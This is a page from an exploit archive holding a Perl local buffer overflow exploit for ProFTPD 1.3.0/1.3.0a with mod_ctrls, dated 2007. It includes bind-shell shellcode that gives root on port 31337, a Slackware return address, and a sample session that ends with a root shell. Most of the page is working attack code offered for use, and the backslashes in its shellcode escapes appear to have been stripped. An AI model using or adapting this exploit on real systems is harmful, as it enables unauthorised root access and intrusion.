ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
# Published : 2007-02-18
# Author : Revenge
# Previous Title : Microsoft Word 2000 Unspecified Code Execution Exploit (0day)
# Next Title : Trend Micro VirusWall 3.81 (vscan/VSAPI) Local Buffer Overflow Exploit

#!/usr/bin/perl -w
 #
 # $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
 #
 # ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
 # [Old style school sploit against gcc 3.x and linux kernel 2.4]
 #
 # Original Advisory :
 #  http://www.coresecurity.com/?action=item&id=1594
 #
 # [ Exploitation condition ]
 # - proftpd must be compiled with --enable-ctrls option
 # - local user needs permission to connect through unix socket (from proftpd.conf)
 #
 # This one works for 2.4 exploitation against gcc 3.x
 # Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
 # I was able to use only a <bind_shell> as payload since a normal setuid + execve seems that doesn't work
 #
 # Tested against:
 # - ProFTPD 1.3.0/1.3.0a on Slackware 11.0 compiled with gcc 3.4.6
 # *** Against v1.3.0a -- server *could* remain up (in a Denial of Service condition) without binding shell
 #
 # revenge@darklight~$ ./revenge_proftpd_ctrls_24.pl /usr/local/var/proftpd/proftpd.sock 1
 # [ wait some secs then nc on port 31337 ]
 # anyone@anywhere:~$ nc <host> 31337
 # id
 # uid=0(root) gid=0(root) groups=50(ftp)
 # exit
 # [ after that server will deactivate ]
 #
 # Alfredo "revenge" Pesoli
 #
 # http://www.0xcafebabe.it/
 # <revenge@0xcafebabe.it>
#

use strict;
use Socket;

if ( @ARGV < 2 ) { &usage(); }

my $hellcode =
# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
"x31xc0x31xdbxb0x17xcdx80x31xc0x31xdbxb0x2excdx80".
"x31xdbxf7xe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80".
"x89xc7x31xc9x66xb9x7ax69x52x66x51x43x66x53x89xe1".
"xb0x10x50x51x57x89xe1xb0x66xcdx80xb0x66xb3x04xcd".
"x80x31xc0x50x50x57x89xe1xb3x05xb0x66xcdx80x89xc3".
"x89xd9xb0x3fx49xcdx80x41xe2xf8xebx18x5ex31xc0x88".
"x46x07x89x76x08x89x46x0cxb0x0bx89xf3x8dx4ex08x8d".
"x56x0cxcdx80xe8xe3xffxffxffx2fx62x69x6ex2fx73x68";

my $rsock   = shift;
my $tn      = shift;

my $ret;
my $nop = "x90"x200;

use constant LSOCK  => '/tmp/tmp.sock';

my %targets = (
   '1' => "x55xefxffxbf" # Slackware 11.0
   # Add here your target RET
);

my %tname = (
   '1' => "Slackware 11.0"
);

$ret = $targets{$tn};

my $buffer = $nop.$hellcode.("$ret"x70);
my $l = length($buffer);

socket (SOCK, PF_UNIX, SOCK_STREAM, 0)  or die "Unable to create socket : $!";
my $rfile = sockaddr_un($rsock);

unlink LSOCK;
my $lfile = sockaddr_un(LSOCK);

bind (SOCK, $lfile) or die "Unable to bind to $lfile";
chmod (00700, LSOCK);

connect (SOCK, $rfile) or die "nUnable to connect to ".$rsock."nMaybe server is down or incorrect pathnn";

print "n Request length => ".$l."n";
print " Target => ".$tname{$tn}."n";

send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buffer,0;

close SOCK;

print "n [#] Request sent - try to connect on port 31337nn";

sub usage() {
   print "n ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow [ Old Style school ]n";
   print " Alfredo "revenge" Pesolin";
   print " <revenge@0xcafebabe.it>nn";
   print "Usage : $0 <path_to_unix_socket> <targets>n";
   print "   Ex : $0 /usr/local/var/proftpd/proftpd.sock 1n";
   print "n Available Targets :n";
   print "  1 => 0xbfffef55 (Slackware 11.0)nn";
   exit();
}

# www.Syue.com [2007-02-18]